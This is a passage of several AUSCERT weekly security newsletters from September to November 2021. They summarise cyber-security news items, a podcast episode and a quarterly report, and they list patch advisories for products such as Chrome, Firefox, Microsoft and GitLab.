of customer data—its metastasizing record of what you search for, what you buy, what shows you watch, what pills you take, what you say to Alexa, and who’s at your front door—had become so sprawling, fragmented, and promiscuously shared within the company that the security division couldn’t even map all of it, much less adequately defend its borders. Cyber attack affects Federal Group payroll system but staff will still be paid Date: 2021-11-17 Author: ABC News Tasmania’s largest private sector employer has been affected by a cyber attack for the second time this year. Federal Group yesterday made advance payments to staff after the payroll system it uses — run by global company Frontier Software — was affected by a “cyber incident”. Federal Group is one of more than 1,500 organisations, including the South Australian government and the Melbourne Theatre Company, that use Frontier’s software. Official FBI email server hacked, used to send fake threat Date: 2021-11-13 Author: The Record A group of unidentified hackers have compromised one of the FBI’s email servers and have sent out a massive wave of spam emails containing a warning about a (fake) cyberattack that was allegedly taking place. The attack, which took place in the early hours of the US East Coast morning [November 13], impacted an email server that the FBI was using for some sort of public ticketing and alerting system, Carel Bitter, Chief Data Officer at Spamhaus, told The Record in an interview today. 91% of IT leaders affected by supply chain disruption: survey Date: 2021-11-16 Author: ZDNet A new survey of 400 IT decision-makers from Insight Enterprises found that 95% of IT decision-makers say the impact of the pandemic accelerated business transformation priorities. The 2022 Insight Intelligent Technology Report found that nearly all of the IT leaders surveyed have been affected in some way by the IT supply chain disruption. The survey featured the responses of 400 North America-based IT leaders to a 23-question survey in September. About two-thirds said they believe their enterprise has successfully adapted to the COVID-19 pandemic and adjusted to new realities using new tech and IT processes. ESB-2021.3890 – Moodle: Multiple vulnerabilities Remote code execution risk found on Moodle when restoring malformed backup file ESB-2021.3952 – php74: Root compromise – Existing account The new update for php74 fixes local privilege escalation via PHP-FPM ESB-2021.3903 – FortiPortal: Cross-site scripting – Remote with user interaction FortiPortal allows an attacker to perform reflected Cross-site scripting attacks via specially crafted HTTP request parameters ESB-2021.3933 – Google Chrome: Multiple vulnerabilities The Chrome team announced the Chrome 96 to the stable channel for Windows, Mac and Linux ESB-2021.3939 – MozillaFirefox: Multiple vulnerabilities SUSE has released an update which fixes 8 Mozilla Firefox vulnerabilities Stay safe, stay patched and have a good weekend! The AUSCERT team  

Podcast Ep 7: The future of the cyber security pipeline and education in Australia LISTEN HERE: AUSCERT “Share Today, Save Tomorrow” Ep 7 The future of the cyber security pipeline and education in Australia   In this episode, AUSCERT features the following guests: > Professor Ryan Ko, Chair & Director, UQ Cyber Security > Ivano Bongiovanni, Lecturer at The University of Queensland > Mike Holm, AUSCERT Senior Manager > Mark Carey-Smith, AUSCERT Principal Analyst   Ryan and Ivano talked about how UQ Cyber Security is helping build a pipeline of cybersecurity talent and the different approach their masters program takes to deliver a more diverse offering to the industry. Mark provided insight into how AUSCERT is supporting UQ Cyber Security through lectures as well as supervising student capstone and research projects. Mike talked about the recent AUSCERT Quarter 3 report findings as well as the recent launch of the Incident Reportal. This episode was hosted by Anthony Caruana and Bek Cheb. Our podcasts aim to provide fascinating insights, great stories from the field and lessons you can take back to your workplace. If you have any ideas or suggestions for what we can talk about, please let us know! The AUSCERT podcast can also be found on Spotify, Apple Podcasts and Google Podcasts.  

AUSCERT Week in Review for 12th November 2021 Greetings, This Saturday, November 13, is World Kindness Day which aims to help everyone understand that compassion for others is what binds us together. The Kindness Factory is on a mission it is to make the world a kinder place! This not-for-profit organisation was founded by former elite cricketer, Kath Koschel, following a series of events that saw her life spiral into despair and darkness without warning. But Kath fought through her ordeal and emerged with a new passion for life and complete understanding of how powerful kindness can be. The Kindness Log is a platform for anyone to log an act of kindness allowing people to share experiences that demonstrate how one small act of kindness can make a really big difference. Remember, the world is full of kind people. If you can’t find one, be one! Earlier this week, AUSCERT Director, Dr David Stockdale, was a guest speaker at the UQ School of IT and Electrical Engineering Cybersecurity Workshop. The topics discussed covered Cyber Incidence Response within Critical Infrastructure and how to uplift our resilience. The session was one of four conducted throughout the day that also discussed diversity in the cybersecurity workforce, upskilling and inter-disciplinary cyber education, to name a few. The experiences, insights and knowledge sharing by the speakers is just one of the many ways AUSCERT collaborates, informs and helps those within the field. But with the strong held belief that cyber security is everyone’s problem, particularly with the shift to remote working over the past eighteen months, what is being done to counter the growing cyber threat? A recent article on Cyber Security Connect discusses what businesses should be doing to help employees, and themselves, tackle the issue. Beyond the Basics: Tips for Building Advanced Ransomware Resiliency Date: 2021-11-05 Author: Threatpost The rate at which ransomware attacks occur is rapidly increasing. Not only have we witnessed the rise in the frequency of these attacks, but have also seen them evolve into more sophisticated, successful and damaging events. The potential monetary gain from a ransomware attack is now so lucrative that many ransomware developers have established affiliate programs for their tools and expertise, offering ransomware-as-a-service. Ransomware demands also continue to skyrocket as more than 80 percent of victim organizations admit to paying ransom demands. Op-Ed: What a house cat can teach us about cybersecurity Date: 2021-11-07 Author: Los Angeles Times The news today often contains reports about cybersecurity breaches that steal our data or threaten our national security. The nation spends billions of dollars on cybersecurity measures, and yet we seem unable to get ahead of this problem. Why are our computers so hard to protect? Recent experience with a house cat provided insights into the nature of this problem. I am allergic to cats. My daughter came home, cat in hand, for an extended stay, and I had to find a way of confining Pounce to a limited area. However, as many cat parents would have known — though I did not — this was doomed to be a losing battle. Businesses don’t know how to manage VPN security properly – and cyber criminals are taking advantage Date: 2021-11-11 Author: ZDNet Cyber attacks targeting vulnerabilities in virtual private networks (VPN) are on the rise, and many organisations are struggling to protect their networks. The Covid-19 pandemic forced many businesses to suddenly move to higher levels of remote working than before, with many organisations dealing with it for the first time. While this was necessary to keep businesses operating, the sudden rise in remote working also provided benefits for cyber criminals, who looked to take advantage of it to carry out attacks against public-facing VPN and cloud services in order to breach networks. Queensland water supplier Sunwater targeted by hackers in months-long undetected cyber security breach Date: 2021-11-11 Author: ABC News It has been revealed that hackers left suspicious files on a webserver to redirect visitor traffic to an online video platform last year. Queensland’s largest regional water supplier, Sunwater, says it was targeted by hackers in a cyber security breach that went undetected for nine months. Sunwater admitted the cyber breach after the tabling of a Queensland’s Audit Office report into the state’s water authorities, which mentioned the incident but did not say which authority was targeted. Microsoft November 2021 Patch Tuesday: 55 bugs squashed, two under active exploit Date: 2021-11-10 Author: ZDNet Microsoft has released 55 security fixes for software including patches that resolve zero-day vulnerabilities actively exploited in the wild. The Redmond giant’s latest round of patches, usually released on the second Tuesday of each month in what is known as Patch Tuesday, includes fixes for six critical vulnerabilities, 15 remote code execution (RCE) bugs, information leaks, and elevation of privilege security flaws, as well as issues that could lead to spoofing and tampering. Products impacted by November’s security update include Microsoft Azure, the Chromium-based Edge browser, Microsoft Office — as well as associated products such as Excel, Word, and SharePoint — Visual Studio, Exchange Server, Windows Kernel, and Windows Defender. Vagabon PhishKit – An Example of Shared Code Modularity Date: 2021-11-03 Author: RiskIQ In early 2021, RiskIQ first detected a new phishing campaign targeting PayPal. The campaign, authored by an actor calling themself “Vagabon”, looks to collect PayPal login credentials, as well as complete credit card information from the victim. While the kit itself doesn’t display many unique characteristics, it does contain bits and pieces of other known, familiar phish kits. This “Frankenstein” technique of piecing together modular, free or readily available kits and services has become increasingly popular. ASB-2021.0236 – Microsoft Apps: Execute arbitrary code/commands – Existing account Microsoft has released its monthly security patch update for the month of November 2021 ESB-2021.3714 – docker.io: Access confidential data – Remote/unauthenticated An information disclosure issue was discovered in the command line interface of docker.io ESB-2021.3716.2 – UPDATE Adobe Creative Cloud Desktop Application: Multiple vulnerabilities Adobe has released an update for the Creative Cloud Desktop for Windows and macOS ESB-2021.3818 – tcpdump: Denial of service – Remote/unauthenticated Denial of Service vulnerability found on tcpdump network traffic tool and an update is now available ESB-2021.3856 – postgresql: Multiple vulnerabilities Two vulnerabilities discovered in the PostgreSQL database system, which could result in man-in-the-middle attacks Stay safe, stay patched and have a good weekend! The AUSCERT team

Q3 2021 Report We would like to take this opportunity to thank our Members for your continued support and share with you the following snapshot of our services stats for Quarter 3 2021. This report provides an overview of the cyber security incidents reported by members, from 1 July – 30 September 2021 and includes a summary of other key achievements this quarter.   https://auscert.shorthandstories.com/quarter-3-2021/index.html

AUSCERT Week in Review for 15th October 2021 Greetings, This week’s image, the captivating and vibrant Jacaranda, is an iconic tree in Australia but is in fact, native to Central and South America. Here at The University of Queensland, they’re even part of local lore, signifying the end of year exams, colloquially known as ‘purple panic’. The idea of panic, isolation and anxiety has been an all too common one of late with this year’s Mental Health Week (October 9 – 17) reminding us of the need to ‘Take time – for mental health’. We can all take steps to promote better health for ourselves and others by engaging in the building blocks of wellbeing. Just remember PERMA: Positive emotion Engagement Relationships Meaning Accomplishments Earlier in the week, the Australian Cyber Security Centre released an update to the Essential 8 (or, E8) which are key mitigation strategies that can save organisations considerable time, money, effort, and reputational damage. The most recent evolution of the E8 has been assessed by CyberSecurity Connect as heightening the baseline for cyber security in Australia. With the growing sophistication of malicious events that target individuals and corporates through phishing, SMS malware, trojan viruses and more, it’s important to understand the value of cyber security. CyberExperts.com delves into the impact a cyber-attack can have. In an ever-changing technological landscape that sees growing inter-connectivity with more Internet of Things (IoT) devices connected globally and cybercrime becoming more sophisticated, cyber security is increasingly important to defend against hackers and other online threats. Microsoft October 2021 Patch Tuesday: 71 vulnerabilities, four zero-days squashed Date: 2021-10-13 Author: ZDNet Microsoft has released 71 security fixes for software including an actively-exploited zero-day bug in Win32k. The Redmond giant’s latest round of patches, usually released on the second Tuesday of each month in what is known as Patch Tuesday, includes fixes for a total of four zero-day flaws, three of which are public. Products impacted by October’s security update include Microsoft Office, Exchange Server, MSHTML, Visual Studio, and the Edge browser. 150 Million Google Users To Get 7 Days’ Notice Before Bold Security Change Date: 2021-10-09 Author: Davey Winder Google has confirmed that it will be pushing forward, on an ‘automatic enrollment’ basis, with a bold security update for some 150 million users before the year-end. The confirmation from Google came by way of an official safety and security blog posting this week. Yes, we are talking about two-factor authentication (2FA) here, or two-step verification (2SV) in the case of Google. What matters most here is that Google is bringing additional protection to your login credentials. Important because, as recent research into credential stuffing showed, the use of compromised login details is on the up. One significant report even pegs 61% of data breaches as involving credential misuse. Emergency Apple iOS 15.0.2 update fixes zero-day used in attacks Date: 2021-10-11 Author: Bleeping Computer Apple has released iOS 15.0.2 and iPadOS 15.0.2 to fix a zero-day vulnerability that is actively exploited in the wild in attacks targeting Phones and iPads. This vulnerability, tracked as CVE-2021-30883, is a critical memory corruption bug in the IOMobileFrameBuffer allowing an application to execute commands on vulnerable devices with kernel privileges. Microsoft Azure fends off huge DDoS Attack Date: 2021-10-13 Author: ZDNet Distributed Denial of Service attacks are happening ever more often and growing ever bigger. At 2.4 terabits per second, the DDoS attack Microsoft just successfully defended European Azure cloud users against could be the biggest one to date. What we know for certain is it’s the biggest DDoS attack on an Azure cloud customer. It was bigger than the previous high, 2020’s Azure 1 Tbps attack, and Microsoft reported it was “higher than any network volumetric event previously detected on Azure.” Who was targeted? We don’t know. Microsoft isn’t talking. The attack itself came from over 70,000 sources. Student finds zero-days in Exterity devices while rick-rolling school district Date: 2021-10-13 Author: The Record An Illinois teenager has found a zero-day vulnerability in Exterity IPTV systems during a rick-roll prank he pulled off on his school district before graduation. On April 30, this year, Minh Duong and a group of close friends took over all networked TVs and other displays inside the six high-schools part of the Illinois Township High School District 214 to play Rick Astley’s infamous “Never Gonna Give You Up” song disguised as an important announcement. The hack, detailed in a step-by-step blog post published last week, involved scanning the school network for connected devices, analyzing their firmware for bugs, and deploying a payload for a carefully timed attack that took over school TV and displays during a recess to prevent interfering with classes or other exams. ASB-2021.0193 – Microsoft Patch Tuesday update for Microsoft Extended Security Update (ESU) products for October 2021 It’s that time of month where Microsoft scare us again – there is the usual assortment of serious vulnerabilities worthy of updates. Keep your systems up to date! ESB-2021.3357 – apache2 security update Apache2 living up to its name, in that the denial of service and data leak risks should be enough for you to, uh, patch it too. ESB-2021.3364 – firefox security update Firefox fraught with fire after felonious fellows find fatal flaw with various flagshi… Actually code execution, DoS and information disclosure are no joking matter, you should pay attention to this one. ESB-2021.3401 – MFSA 2021-46 and MFSA 2021-47 Security Vulnerabilities fixed in Thunderbird Do you like computers? How would you like to use emails to gain control of someone else’s computer? Wait, no, we’re the good guys… If you DON’T want to lose your servers, we recommend checking these vulnerabilities out. ESB-2021.3415 – wordpress security update Word press cross site scripting sending you cross eyed this week, which won’t help the double vision you get when your users are impersonating each other as well. Patch time! Stay safe, stay patched and have a good weekend! The AUSCERT team

AUSCERT Week in Review for 5th November 2021 Greetings, Last year’s BDO and AUSCERT Cyber Security Survey found that data breaches doubled and organisations were overconfident in their cyber controls. To challenge this trend, now is the time to review your approach to cyber security. The annual BDO and AUSCERT Cyber Security Survey identifies the current cyber security trends, issues and threats facing organisations across Australia and New Zealand. We invite you to take our 10-minute survey which provides the opportunity to sense check your organisation’s approach to cyber risk. By taking part, you will gain access to valuable data, allowing you to benchmark your organisation’s cyber security efforts and gain insights into the cyber threats faced by your industry peers. Survey respondents will go in the draw to win an Apple Watch. The survey closes at midnight on Friday, 3 December 2021. A recent article by ZDNet revealed that a significant number of people have accepted that remote working may be accompanied by being monitored by the companies they work for. Based on a survey of 11,000 consumers across eleven countries, the article also points out that only a small number of respondents were familiar with cyber security issues or, where to report scams should they be targeted, highlighting the potential risk for organisations in a hybrid working environment. It’s Movember again, a global campaign which quite simply asks you to pay attention to, talk about, raise funds and, most importantly, raise awareness for men’s cancers and other men’s health issues. The traditional way to get involved is to “Grow a Mo” but anyone can show their support by taking part in “Move for Movember”, “Host a Mo-ment” and “Mo Your Own Way”. The campaign runs for the entire month so there’s plenty of time to get involved and create your very own mo-ments to support men’s health issues. Building sovereign resilience into Australian technology supply chains Date: 2021-10-28 Author: Cyber Security Connect Proofpoint threat researchers have identified a new, highly active cyber criminal threat actor TA2722, and have colloquially named the cyber threat group as the ‘Balikbayan Foxes’. The cyber criminal group impersonates Philippine health, labour and customs organisations as well as other entities based in the Philippines. A series of campaigns impersonated multiple Philippine government entities including the Department of Health, the Philippine Overseas Employment Administration and the Bureau of Customs. ‘Trojan Source’ Bug Threatens the Security of All Code Date: 2021-11-01 Author: Krebs on Security Researchers with the University of Cambridge discovered a bug that affects most computer code compilers and many software development environments. At issue is a component of the digital text encoding standard Unicode […]. Specifically, the weakness involves Unicode’s bi-directional or “Bidi” algorithm, which handles displaying text that includes mixed scripts with different display orders, such as Arabic — which is read right to left — and English (left to right). “By placing Bidi override characters exclusively within comments and strings, we can smuggle them into source code in a manner that most compilers will accept. Our key insight is that we can reorder source code characters in such a way that the resulting display order also represents syntactically valid source code.” Microsoft: This macOS flaw could have let attackers install undetectable malware Date: 2021-11-01 Author: ZDNet Apple has patched a security flaw in macOS that Microsoft researchers found could be used to install a malicious kernel driver, otherwise known as a ‘rootkit’. The flaw resided within macOS System Integrity Protection (SIP). The glitch allowed a potential attacker to install a hardware interface that allows them to “overwrite system files, or install persistent, undetectable malware”. FBI: Ransomware groups tying attacks to ‘significant financial events’ Date: 2021-11-03 Author: ZDNet The FBI has released a new report saying ransomware groups are increasingly using “significant financial events” as leverage during their attacks. According to the FBI, ransomware groups are using events like mergers and acquisitions to target companies and force them into paying ransoms. “Prior to an attack, ransomware actors research publicly available information, such as a victim’s stock valuation, as well as material non-public information. If victims do not pay a ransom quickly, ransomware actors will threaten to disclose this information publicly, causing potential investor backlash,” the FBI wrote. EU to adopt new cybersecurity rules for smartphones, wireless, IoT devices Date: 2021-11-01 Author: The Record The European Commission has ordered an update to the Radio Equipment Directive in order to introduce new cybersecurity guidelines for radio and wireless equipment sold on the EU market, such as mobile phones, tablets, fitness trackers, and other smart IoT devices. The new standards, which are currently scheduled to enter into effect by mid-2024, were adopted following a delegated act to the Radio Equipment Directive, a piece of 2014 EU legislation that acts as the regulatory framework that equipment vendors must follow in order to sell electronic equipment on the EU market. Google wants every account to use 2FA, starts auto-enrolling users Date: 2021-11-04 Author: Ars Technica Google announced earlier this year that it is planning to forcefully transition as many of its users as possible to two-factor authentication. The company elaborated further in October, saying it was planning to auto-enroll 150 million Google accounts in 2FA by the end of the year. Now, with just two months left in the year, Android Police has found a few reports showing that the process has started, with some users finally being auto-enrolled in 2FA. ESB-2021.3668 – ALERT Catalyst Passive Optical Network (PON) Series Switches: Multiple vulnerabilities Cisco has released software updates that address vulnerabilities in Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) ESB-2021.3667 – ALERT Policy Suite: Root compromise – Remote/unauthenticated Cisco has released free software updates that address the vulnerability in the key-based SSH authentication mechanism of Cisco Policy Suite which could lead to root compromise ASB-2021.0229.2 – UPDATED ALERT Unicode Directional Formatting: Multiple Vulnerabilities An attacker could exploit Unicode Standards to deceive a human code reviewer and hide unexpected and potentially dangerous behavior ESB-2021.3666 – GitLab: Multiple vulnerabilities This critical vulnerability is the result of improper validation of image files by a 3rd-party file parser, resulting in a remote command execution vulnerability ESB-2021.3684 – Firefox: Multiple vulnerabilities Firefox could be made to crash or run programs as your login if it opened a malicious website Stay safe, stay patched and have a good weekend! The AUSCERT team

AUSCERT Week in Review for 1st October 2021 Greetings, Today is International Coffee Day, an opportunity to celebrate the tasty brew that provides a kickstart to get us going or provides a boost to sustain us when needed. How do you prefer your coffee? Earlier in the week, it was revealed that almost 10 million Android devices globally had been infected with malware delivered via GriftHorse apps. The Register reported on the Trojan code that has already netted millions of dollars. ZDNet advised many experts, including VMware and CISA, have been begging people to address the CVE-2021-22005 issue, a vulnerability with VMware vCenter, by updating their systems as soon as possible. Microsoft rolled out a new feature to Exchange that will automatically install temporary mitigations that block active security flaws until an official patch is released by Microsoft. The Record wrote about the proactive move by Microsoft with its first-of-its-kind security feature. Lastly, we wanted to advise of some upcoming training that is being held in the last quarter of 2021, delivered remotely via Zoom. The courses will focus on Cyber Security Risk Management and Introduction to Cyber for IT Professionals. Dates and further information can be found on the online booking portal or, by contacting us via email at training@auscert.org.au Emergency Google Chrome update fixes zero-day exploited in the wild Date: 2021-09-24 Author: Bleeping Computer Google has released Chrome 94.0.4606.61 for Windows, Mac, and Linux, an emergency update addressing a high-severity zero-day vulnerability exploited in the wild. “Google is aware that an exploit for CVE-2021-37973 exists in the wild,” the browser vendor revealed in Friday’s security advisory. Victoria launches five-year, AU$50 million cyber strategy Date: 2021-09-20 Author: ZDNet The Victorian government has launched a new five-year cyber strategy that will see over AU$50 million be allocated towards bolstering the state’s cybersecurity resilience. The cyber strategy will focus on three core missions that government has described as providing safe and reliable delivery of government services, creating a cyber safe place, and creating a “vibrant” cyber economy. The strategy will be implemented through the state’s chief information security officer releasing annual mission delivery plans that outline specific activities associated with the three core missions. The CISO will develop this plan in consultation with relevant stakeholders across government, industry, and the community. Microsoft adds novel feature to Exchange servers to allow it to deploy emergency temporary fixes Date: 2021-09-27 Author: The Record Microsoft will soon roll out a new security feature for its Exchange email servers, which have been at the center of several hacking campaigns over the past two years. Called the Microsoft Exchange Emergency Mitigation service, the new feature works by automatically installing temporary mitigations that block active exploitation of security flaws until Microsoft is ready to release official patches. The Emergency Mitigation service will be enabled by default for all Exchange servers once they install the September 2021 Cumulative Updates for Exchange servers, which are shipping out soon, after Microsoft delayed their release last week to have more time to work on it. Wide-ranging BEC scam underscores dangers of doing business with (un)trusted suppliers Date: 2021-09-27 Author: SC Media Such schemes, referred to as “business email compromise,” often don’t get nearly the amount of attention or public awareness as ransomware and other forms of cybercrime, but the cumulative losses to businesses and individuals every year often dwarf what is seen in almost all other areas of digital crime. According to the latest annual internet crime report from the FBI, they helped fuel a record account of complaints reported to authorities by the American public in 2020, with 19,369 complaints and adjusted losses of $1.8 billion attributed to BEC schemes alone. Govt cyber incident intervention powers likely to be rushed in Date: 2021-09-30 Author: iTnews ‘Last resort’ powers that would allow the government to intervene to contain a cyber attack on critical infrastructure should be “swiftly legislated”, a parliamentary committee says. ESB-2021.3226 – ALERT Google Chrome: Execute arbitrary code/commands – Remote with user interaction Google Chrome has released updates to fix an actively exploited zero-day vulnerability tracked as CVE-2021-37973. ASB-2021.0187 – Microsoft Edge (Chromium-based): Multiple vulnerabilities Microsoft last week rolled out updates for its Chromium based Edge browser addressing multiple vulnerabilities including the zero day CVE-2021-37973. ESB-2021.3214 – Traffix SDC: Denial of service – Remote/unauthenticated F5 is yet to release the fix for Traffix SDC to address use-after-free vulnerability in glibc. ESB-2021.3262 – GitLab Community Edition and GitLab Enterprise Edition: Multiple vulnerabilities GitLab addresses numerous vulnerabilities in latest security release including stored XSS, DNS rebinding, and a bunch of permission mishaps. ESB-2021.3162.2 – UPDATE ALERT VMware vCenter Server & Cloud Foundation : Multiple vulnerabilities VMware has updated their security advisory to confirm that CVE-2021-22005 is being exploited in the wild. Stay safe, stay patched and have a good weekend! The AUSCERT team